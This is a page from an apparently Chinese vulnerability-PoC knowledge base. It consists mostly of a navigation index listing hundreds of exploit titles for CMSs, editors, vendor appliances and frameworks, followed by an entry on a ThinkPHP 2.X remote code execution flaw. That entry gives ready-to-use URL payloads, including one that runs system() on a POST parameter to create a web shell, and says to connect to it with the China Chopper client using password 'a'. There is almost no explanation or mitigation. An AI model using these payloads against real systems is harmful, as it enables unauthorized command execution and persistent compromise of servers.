    Thinkphp 5.1.(16-22) sql注入漏洞
    
    Thinkphp 5.1.(6-8) sql注入漏洞
    
    Thinkphp 5.x远程代码执行漏洞环境
    
    Thinkphp5文件包含漏洞
    
    Thinkphp5命令执行批量验证脚本
    
    Thinkphp
    
    Thinkphp 5.0.x通杀gethell
    
    UsualToolCMS
    UsualToolCMS
    
    UsualToolCMS 8.0 sql注⼊漏洞
    
    WDJACMS
    WDJACMS
    
    WDJACMS1.5.2模板注入漏洞
    
    WTCMS
    WTCMS
    
    文件上传getshell
    
    WellCMS
    WellCMS
    
    WellCMS 2.0 Beta3 后台任意文件上传
    
    Wordpress
    Wordpress
    
    CVE-2018-6389 Wordpress Exploit
    
    imagecolormatch() OOB Heap Write exploit
    
    imagecolormatch() OOB Heap Write exploit
    
    WordPress_4.4_SSRF
    
    WordPress_4.7.0-4.7.1_未授权内容注入
    
    WordPress_4.7_Info_Disclosure
    
    0x01 Wordpress简介
    
    简介
    
    Wordpress IMPress for IDX Broker 低权限xss漏洞
    
    pocFiles
    
    WordPress评论插件wpDiscuz任意文件上传漏洞
    
    YXCMS
    YXCMS
    
    YCCMS 3.4 任意文件上传漏洞（一）
    
    YCCMS 3.4 任意文件上传漏洞（二）
    
    YCCMS 3.4 反射型xss
    
    YCCMS 3.4 未授权更改管理员账号密码
    
    YCCMS3.4任意文件删除
    
    YXCMS 1.4.7SQL注入
    
    YXCMS 1.4.7任意文件写入
    
    YXCMS 1.4.7任意文件删除（一）
    
    YXCMS 1.4.7任意文件删除（二）
    
    YXCMS 1.4.7储存型xss
    
    YXcms 1.4.7 跨站请求伪造漏洞
    
    Yii
    Yii
    
    CVE-2020-15148 Yii框架反序列化远程命令执行
    
    YzmCMS
    YzmCMS
    
    YzmCMS 3.6存在XSS漏洞
    
    Z Blog
    Z Blog
    
    Z Blog 1.5.1.1740存在XSS漏洞
    
    ZZCMS
    ZZCMS
    
    ZZCMS201910 SQL注入
    
    Drupal
    Drupal
    
    About Drupal
    
    indexhibitCMS
    indexhibitCMS
    
    CVE 2019 16314 indexhibit cms v2.1.5 存在重装并导致getshell
    
    Indexhibit cms v2.1.5 直接编辑php文件getshell
    
    Jenkins
    Jenkins
    
    PoC: Jenkins RCE
    
    joyplusCMS
    joyplusCMS
    
    joyplus cms 1.6.0存在CSRF漏洞可增加管理员账户
    
    macCMS
    macCMS
    
    maccms v10存在CSRF漏洞可增加任意账号
    
    Seacms
    Seacms
    
    SeaCMS v6.45前台Getshell 代码执行
    
    Seacms6.54远程代码执行
    
    Seacms6.55远程代码执行
    
    Seacms6.61后台getshell
    
    Typeecho
    Typeecho
    
    Typecho反序列化漏洞
    
    vBulletin
    vBulletin
    
    CVE 2019 16759 vBulletin 5.x 0day pre auth RCE exploit
    
    Zabbix
    Zabbix
    
    zabbix 2.2.x, 3.0.0 3.0.3版本SQL注入漏洞
    zabbix 2.2.x, 3.0.0 3.0.3版本SQL注入漏洞
    
    zabbix 2.2.x, 3.0.0 3.0.3版本SQL注入漏洞
    
    Zabbix后台getshell
    Zabbix后台getshell
    
    Zabbix后台getshell
    
    五指CMS
    五指CMS
    
    五指CMS 4.1.0存在CSRF漏洞可增加管理员账户
    
    泛微
    泛微
    
    泛微 e cology OA 前台SQL注入漏洞
    
    泛微OA Bsh 远程代码执行漏洞
    
    泛微OA数据库配置信息泄漏
    
    泛微e cology SQL注入漏洞
    
    泛微e mobile ognl注入
    
    泛微云桥e-bridge 目录遍历/文件读取漏洞
    
    泛微云桥任意文件读取
    
    熊海CMS
    熊海CMS
    
    主目录存在文件包含
    
    前台多处SQL注入
    
    反射型XSS
    
    后台万能密码登录
    
    存储型XSS
    
    安装流程中存在SQL注入
    
    越权
    
    狂雨CMS
    狂雨CMS
    
    后台数据泄露
    
    文件包含
    
    用友
    用友
    
    用友 GRP-u8注入漏洞
    
    用友GRP-U8行政事业内控管理软件SQL注入漏洞
    
    禅道
    禅道
    
    pocFiles
    
    禅道11.6RCE漏洞
    
    禅道11.6任意文件读取
    
    禅道11.6后台SQL注入
    
    zentao-getshell 禅道8.2 - 9.2.1前台Getshell
    
    禅道8.2-9.2.1注入GetShell
    
    致远
    致远
    
    致远OA ajax.do 未授权漏洞任意文件上传
    
    致远OA任意文件下载漏洞(CNVD 2020 62422)
    
    致远OA系统多版本Getshell漏洞复现
    
    通达
    通达
    
    通达OA 11.6文件删除+文件上传getshell
    
    通达OA 11.7存在sql注入
    
    通达OA2017前台任意用户登录漏洞
  - 02 编辑器漏洞
    02 编辑器漏洞
    
    CKEditor4.0.1多个安全漏洞
    
    CKfinder
    CKfinder
    
    CKfinder 1.4.3编辑器漏洞
    
    Cute editor
    Cute editor
    
    Cute editor Asp.net 解析漏洞利用
    
    Cute editor本地文件包含漏洞
    
    EWeb editor
    EWeb editor
    
    Eweb编辑器任意文件上传漏洞
    
    Eweb编辑器前攻击痕迹查看
    
    Eweb编辑器目录遍历漏洞
    
    FCKeditor
    FCKeditor
    
    FCKeditor编辑器渗透思路
    
    Freetextbox editor
    Freetextbox editor
    
    Freetextbox Asp.net解析漏洞
    
    Freetextbox目录遍历漏洞
    
    Kindeditor
    Kindeditor
    
    KindEditor 3.4.2&3.5.5列目录漏洞
    
    Kindeditor 3.2.1任意文件上传漏洞
    
    Kindeditor 3.5.2 4.1上传修改拿shell
    
    kindeditor上传漏洞
    
    kindeditor<=4.1.5上传漏洞
    
    Kindeditor 解析漏洞上传
    
    MSNeditor
    MSNeditor
    
    MSN编辑器任意文件上传漏洞
    
    Ueditor
    Ueditor
    
    Ueditor 反射型xss漏洞
    
    Ueditor xss存储漏洞
    
    Ueditor编辑器.NET1.4.3.3版本任意文件上传漏洞
    
    Ueditor ssrf漏洞
    
    Webhtmleditor
    Webhtmleditor
    
    Webhtml editor 解析漏洞利用
    
    南方数据southidceditor
    南方数据southidceditor
    
    南方数据编辑器southidceditor注入漏洞
  - 03 产品漏洞
    03 产品漏洞
    
    Adminer
    Adminer
    
    Adminer 服务器端请求伪造漏洞
    
    Adobe
    Adobe
    
    Adobe ColdFusion
    Adobe ColdFusion
    
    Adobe ColdFusion 反序列化漏洞（CVE 2017 3066）
    
    Adobe ColdFusion 文件读取漏洞
    
    Cacti
    Cacti
    
    CVE 2020 8813 Cacti v1.2.8 RCE
    
    Citrix
    Citrix
    
    Citrix 远程代码执行漏洞复现（CVE-2019-19781）
    
    Cobub razor
    Cobub razor
    
    Cobub Razor 0.7.2存在跨站请求伪造漏洞
    
    Cobub Razor 0.7.2越权增加管理员账户
    
    Cobub Razor 0.8.0存在SQL注入漏洞
    
    Cobub Razor 0.8.0存在物理路径泄露漏洞
    
    Couch through 2.0存在路径泄露漏洞
    
    Django
    Django
    
    CVE-2020-7471 漏洞
    
    Easy Chat Server
    Easy Chat Server
    
    Easy Chat Server 3.1 ‘message’ Denial of Service
    
    Easy File Sharing Web Server
    Easy File Sharing Web Server
    
    Easy File Sharing Web Server 7.2 GET 缓冲区溢出 (SEH)
    
    Fortigate SSL VPN
    Fortigate SSL VPN
    
    Fortigate SSL VPN多个漏洞
    
    FreeFtp
    FreeFtp
    
    freeFTP1.0.8 'PASS'远程缓冲区溢出
    
    FusionAuth
    FusionAuth
    
    简介
    
    Git
    Git
    
    Git凭证泄露漏洞（CVE-2020-5260）
    
    Gitlab CEEE
    Gitlab CEEE
    
    Gitlab CEEE任意文件读取导致远程命令执行漏洞(CVE 2020 10977)
    
    Harbor
    Harbor
    
    CVE-2019-16097-batch
    
    Harbor任意管理员注册漏洞
    
    pocFiles
    
    Horde Groupware
    Horde Groupware
    
    0x00 简介
    
    Horde Groupware Webmail Edition 远程命令执行
    
    HyperBook Guestbook
    HyperBook Guestbook
    
    HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password信息泄露漏洞
    
    IE浏览器
    IE浏览器
    
    IE浏览器远程代码执行漏洞
    
    Jira
    Jira
    
    Atlassian Jira信息泄露漏洞
    
    CVE-2019-8451 Jira未授权SSRF漏洞
    
    pocFiles
    
    Atlassian Jira信息泄露漏洞
    Atlassian Jira信息泄露漏洞
    
    pocFiles
    
    JunmpServer
    JunmpServer
    
    -- coding: utf-8 --
    
    Kibana
    Kibana
    
    CVE 2019 7609 kibana低于6.6.0未授权远程代码命令执行
    
    Liferay Portal
    Liferay Portal
    
    Liferay Portal代码执行
    
    Metabase 信息泄露漏洞
    Metabase 信息泄露漏洞
    
    CVE-2021-41277 Metabase 信息泄露漏洞
    
    Mobilelron
    Mobilelron
    
    MobileIron MDM 未授权RCE EXP
    
    Mongoose Web Server
    Mongoose Web Server
    
    Mongoose Web Server 6.9 Denial of Service
    
    Netlogon
    Netlogon
    
    Netlogon 特权提升漏洞（CVE-2020-1472）
    
    OSSN
    OSSN
    
    OSSN任意文件读取漏洞（CVE 2020 10560）
    
    OpenSMTP
    OpenSMTP
    
    CVE 2020 8794 OpenSMTPD 远程命令执行漏洞
    
    Redis
    Redis
    
    Redis Rogue Server
    
    Redis rogue server
    Redis rogue server
    
    pocFiles
    
    redis、mongodb、memcached、elasticsearch、zookeeper、ftp、CouchDB、docker、Hadoop未授权
    redis、mongodb、memcached、elasticsearch、zookeeper、ftp、CouchDB、docker、Hadoop未授权
    
    unauthorized-check
    
    pocFiles
    
    SSH
    SSH
    
    OpenSSH命令注入CVE-2020-15778
    
    SaltStack
    SaltStack
    
    SaltStack认证绕过漏洞 CVE 2020 11651
    
    SharePoint
    SharePoint
    
    CVE-2020-1181 SharePoint远程代码执行漏洞
    
    SonicWall SSL VPN
    SonicWall SSL VPN
    
    !/usr/bin/python
    
    SpamTitan
    SpamTitan
    
    SpamTitan 7.07多个RCE漏洞
    
    Sprig Cloud
    Sprig Cloud
    
    Spring Cloud Netflix Hystrix Dashboard SSRF
    
    Spring Statemachine
    Spring Statemachine
    
    yii2 statemachine v2.x.x存在XSS漏洞
    
    TeamViewer
    TeamViewer
    
    TeamViewer 远程代码执行漏洞(CVE-2020-13699)
    
    ThinVnc
    ThinVnc
    
    CVE 2019 17662 ThinVNC 1.0b1 Authentication Bypass
    
    VMware
    VMware
    
    VMware vCenter未授权任意文件读取
    
    Webmin
    Webmin
    
    CVE 2019 15107
    CVE 2019 15107
    
    CVE-2019-15107 Webmin RCE <=1.920
    
    pocFiles
    
    X.org X server
    X.org X server
    
    CVE 2019 17624 X.Org X Server 1.20.4 Local Stack Overflow Linux图形界面X Server本地栈溢出POC
    
    ezEIP
    ezEIP
    
    万户网络技术有限公司ezEIP前台存在文件上传漏洞
    
    Mini httpd
    Mini httpd
    
    mini_httpd任意文件读取漏洞（CVE-2018-18778）
    
    Nexus
    Nexus
    
    Nexus Repository Manager 3 远程代码执行漏洞CVE-2019-7238
    
    Nexus Repository Manager Groovy注入漏洞（CVE 2020 11753）
    
    nexus oss 命令执行漏洞 (cve-2020-10199 && 10204)
    
    phpMyAdmin
    phpMyAdmin
    
    phpMyAdmin SQL注入(CVE-2020-0554)
    
    phpMyAdmin文件包含漏洞
    
    漏洞编号
    
    Phpstudy
    Phpstudy
    
    phpStudy nginx 解析漏洞
    
    Phpmyadmin defaultpwd
    
    Phpstudy backdoor
    
    漏洞版本
    
    !/usr/bin/env python
    
    rConfig
    rConfig
    
    rConfig v3.9.2 RCE漏洞
    
    Rsyns
    Rsyns
    
    rsync 未授权访问漏洞
    
    Showdoc
    Showdoc
    
    Showdoc的api page存在任意文件上传getshell
    
    vBulletin
    vBulletin
    
    vBulletin 5.x RCE（CVE-2019-16759 ）
    
    vBulletin5 5.6.1 SQL注入漏洞
    
    Winrar
    Winrar
    
    WinRAR穿透漏洞（CVE 2018 20250）
    
    海康威视
    海康威视
    
    Hikvision(CVE 2017 7921)
  - 04 厂商漏洞
    04 厂商漏洞
    
    F5
    F5
    
    漏洞编号
    
    Microsoft
    Microsoft
    
    Microsoft Exchange Server
    Microsoft Exchange Server
    
    CVE-2020-0688_微软EXCHANGE服务的远程代码执行漏洞复现
    
    CVE 2020 17083 Microsoft Exchange Server任意代码执行漏洞 POC
    
    Microsoft Windows Print Spooler
    Microsoft Windows Print Spooler
    
    CVE-2020-1048 Microsoft Windows Print Spooler提权漏洞
    
    CVE 2020 1337
    
    CVE 2020 1048 Microsoft Windows Print Spooler提权漏洞
    CVE 2020 1048 Microsoft Windows Print Spooler提权漏洞
    
    pocFiles
    
    Office
    Office
    
    Microsoft.Data.Odata 安全漏洞
    
    Windows DNS Server
    Windows DNS Server
    
    CVE-2020-1350 Windows DNS Server蠕虫级远程代码执行漏洞
    
    CVE 2020 1350 Windows DNS Server蠕虫级远程代码执行漏洞
    CVE 2020 1350 Windows DNS Server蠕虫级远程代码执行漏洞
    
    pocFiles
    
    TP link
    TP link
    
    CVE 2020 9374
    
    TP Link云摄像头NCXXX系列存在命令注⼊漏洞
    
    亚马逊
    亚马逊
    
    Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞
    
    华为
    华为
    
    华为WS331a产品管理页面存在CSRF漏洞
    
    华硕
    华硕
    
    影响产品：
    
    友讯
    友讯
    
    CVE 2019 16920 D Link 远程命令执行
    
    天融信
    天融信
    
    天融信数据防泄漏系统越权修改管理员密码
    
    宝塔
    宝塔
    
    宝塔面板phpMyAdmin未授权访问漏洞
    
    思科
    思科
    
    CVE 2020 27131 思科安全管理器反序列化漏洞 POC
    
    CVE 2020 3452：Cisco ASAFTD任意文件读取漏洞
    
    深信服
    深信服
    
    深信服EDR 远程命令执行-2020-hvv2
    
    深信服EDR任意命令执行漏洞
    
    深信服EDR任意用户登录漏洞
    
    深信服VPN任意修改绑定手机
    
    深信服VPN任意密码重置
    
    电信
    电信
    
    天翼创维awifi路由器存在多处未授权访问漏洞
    
    绿盟
    绿盟
    
    绿盟UTS综合威胁探针管理员任意登录
    
    绿盟WAF绕过
    
    网瑞达
    网瑞达
    
    网瑞达webvpn远程命令执行
    
    联软
    联软
    
    联软准入-任意文件上传
    
    脉冲安全
    脉冲安全
    
    CVE-2019-11510-1
    
    pocFiles
    
    蜂网
    蜂网
    
    CVE 2019 16313 蜂网互联企业级路由器v4.31密码泄露漏洞
    
    金山
    金山
    
    金山WPS Office远程堆损坏漏洞导致代码执行
    
    锐捷易
    锐捷易
    
    锐捷易网关远程命令执行
    
    锐捷易网关guest越权命令执行
    
    锐捷易网关远程命令执行
    
    锐捷网络 EWEB网管系统RCE漏洞
    
    齐治
    齐治
    
    齐治堡垒机前台远程命令执行漏洞-0day
  - 05 系统漏洞
    05 系统漏洞
    
    Linux
    Linux
    
    Linux kernel权限提升漏洞 CVE-2021-3493
    
    Linux sudo权限提升漏洞 CVE-2021-3156
    
    MacOS
    MacOS
    
    macOS Kernel Exploit
    macOS Kernel Exploit
    
    macOS-Kernel-Exploit
    
    Windows
    Windows
    
    CVE 2020 16898 Bad Neighbor Windows TCPIP远程代码执行漏洞分析
    
    Windows DNS Server远程代码执行漏洞（CVE 2020 1350
    
    BlueKeep
    BlueKeep
    
    Bluekeep PoC
    
    CVE 2019 0708 msf快速搭建
    
    pocFiles
    
    bluekeep CVE 2019 0708 python
    bluekeep CVE 2019 0708 python
    
    bluekeep
    
    pocFiles
    
    CVE 2019 0708
    CVE 2019 0708
    
    pocFiles
    
    漏洞编号
    
    CVE 2019 0803
    CVE 2019 0803
    
    CVE 2019 0803 Win32k Elevation of Privilege Poc
    
    CVE 2019 0803
    CVE 2019 0803
    
    CVE-2019-0803
    
    CVE 2020 0796
    CVE 2020 0796
    
    CVE 2020 0796检测与修复
    
    pocFiles
  - 06 中间件框架漏洞
    06 中间件框架漏洞
    
    Apache
    Apache
    
    Apache Cocoon XML 外部实体注入漏洞（CVE-2020-11991）
    
    Apache DolphinScheduler高危漏洞（CVE-2020-11974、CVE-2020-13922）
    
    Apache Dubbo反序列化漏洞(CVE 2019 17564)
    
    Apache Dubbo恶意代码执行CVE 2020 1948
    
    Apache Flink 任意文件读取(CVE 2020 17519 )
    
    Apache Flink任意文件写入漏洞(CVE 2020 17518)
    
    Apache Httpd换行解析漏洞
    
    Apache Tomcat拒绝服务漏洞（CVE 2020 13935）
    
    Apache-Tomcat-Ajp文件包含CVE-2020-1938
    
    Apache拒绝服务漏洞
    
    CVE 2020 26945 mybatis二级缓存反序列化漏洞
    
    CVE 2021 42013 apache路径遍历
    
    Apache Solr
    Apache Solr
    
    Apache Solr未授权上传漏洞
    
    Apache Solr远程命令执行 CVE-2019-0193
    
    Apache shiro
    Apache shiro
    
    Apache Shiro 权限绕过漏洞（CVE 2020 13933）
    Apache Shiro 权限绕过漏洞（CVE 2020 13933）
    
    Apache Shiro 权限绕过漏洞（CVE 2020 13933）
    
    Couchdb任意命令执行漏洞CVE 2017 12636
    Couchdb任意命令执行漏洞CVE 2017 12636
    
    Apache couchdb 任意命令执行漏洞（cve-2017-12636）
    
    Couchedb垂直越权绕过漏洞CVE 2017 12635
    Couchedb垂直越权绕过漏洞CVE 2017 12635
    
    Couchdb 垂直权限绕过漏洞（CVE-2017-12635）漏洞
    
    DJANGO
    DJANGO
    
    CVE 2019 14234 Django JSONField SQL注入漏洞复现
    
    Django GIS SQL注入漏洞复现
    
    Django SQL注入漏洞（CVE 2020 7471）复现
    
    Django任意URL跳转漏洞（CVE 2018 14574)
    
    Jackson
    Jackson
    
    Jackson反序列化远程代码执行 CVE-2020-24616
    
    jackson-databind RCE CVE-2020-9548
    
    Jackson反序列化远程代码执行 CVE 2020 24616
    Jackson反序列化远程代码执行 CVE 2020 24616
    
    pocFiles
    
    Shiro
    Shiro
    
    pocFiles
    
    Shiro RememberMe 1.2.4 反序列化命令执行漏洞
    Shiro RememberMe 1.2.4 反序列化命令执行漏洞
    
    pocFiles
    
    Spring
    Spring
    
    CVE-2020-5398-Spring MVC的RFD（反射文件下载）
    
    漏洞公告
    
    !/usr/bin/python3
    
    Struts2
    Struts2
    
    Struts2 S2-032远程代码执行
    
    Struts2 S2-045远程代码执行
    
    Struts2 S2-057 远程代码执行漏洞(CVE-2018-11776)
    
    一、简介
    
    Struts2 061
    
    pocFiles
    
    About Apache Struts2
    
    S2 048(CVE 2017 9791)
    S2 048(CVE 2017 9791)
    
    S2-048(CVE-2017-9791)
    
    pocFiles
    
    Struts2 Scan
    Struts2 Scan
    
    Struts2-Scan
    
    pocFiles
    
    Struts2 045 Poc
    Struts2 045 Poc
    
    Index
    
    pocFiles
    
    Search S2 045
    Search S2 045
    
    Index
    
    pocFiles
    
    Weblogic
    Weblogic
    
    CVE 2019 2890 Oracle WebLogic 反序列化严重漏洞
    
    Oracle WebLogic 反序列化严重漏洞CVE-2019-2890
    
    WebLogic UniversalExtractor反序列化漏洞(CVE 2020 14645)
    
    WebLogic coherence远程代码执行漏洞(CVE 2020 2555)复现
    
    Weblogic GIOP反序列化漏洞
    
    Weblogic 远程代码执行漏洞（CVE 2020 2883）
    
    Weblogic反序列化漏洞-CVE-2020-14882
    
    Weblogic反序列化漏洞CNVD-C-2019-48814
    
    Cve 2020 14841 weblogic jndi注入
    
    pocFiles
    
    About Oracle Weblogic
    
    weblogic任意文件读取CVE 2019 2615 2618
    
    CVE 2017 3506 & CVE 2017 10271
    CVE 2017 3506 & CVE 2017 10271
    
    CVE-2017-3506 & CVE-2017-10271
    
    pocFiles
    
    CVE 2018 2628
    CVE 2018 2628
    
    CVE-2018-2628
    
    pocFiles
    
    CVE 2018 2893
    CVE 2018 2893
    
    CVE-2018-2893
    
    pocFiles
    
    Weblogic 2019 2725 2729
    Weblogic 2019 2725 2729
    
    Index
    
    pocFiles
    
    Cve 2017 10271
    Cve 2017 10271
    
    漏洞编号
    
    pocFiles
    
    CVE 2017 10271(JAVA XMLDecoder反序列化专用工具)
    CVE 2017 10271(JAVA XMLDecoder反序列化专用工具)
    
    pocFiles
    
    MACOSX
    MACOSX
    
    CVE 2017 10271(JAVA XMLDecoder反序列化专用工具)
    CVE 2017 10271(JAVA XMLDecoder反序列化专用工具)
    
    pocFiles
    
    XStream
    XStream
    
    CVE 2019 10173 Xstream 1.4.10版本远程代码执行漏洞
    
    Docker
    Docker
    
    docker runC容器逃逸漏洞CVE 2019 5736
    
    Fastadmin
    Fastadmin
    
    fastadmin最新版前台getshell
    
    Jboss
    Jboss
    
    pocFiles
    
    Nginx
    Nginx
    
    Nginx中php配置错误导致的解析漏洞
    
    Nginx文件名逻辑漏洞
    
    Nginx越界读取缓存漏洞
    
    Tomcat
    Tomcat
    
    pocFiles
    
    Websphere
    Websphere
    
    IBM WebSphere存在XXE外部实体注⼊漏洞 CVE-2020-4643
- 知识库
  知识库
- 速查表
  速查表

目录

漏洞范围
漏洞POC

Thinkphp 2.X RCE漏洞

漏洞范围¶

Thinkphp 2.X

漏洞POC¶

/index.php?s=/index/index/xxx/${@phpinfo()}

/index.php?s=/index/index/xxx/${@print(system($_POST[a]))}

菜刀连接,密码为a。

Copyright © 2023 @Timlzh

Made with Material for MkDocs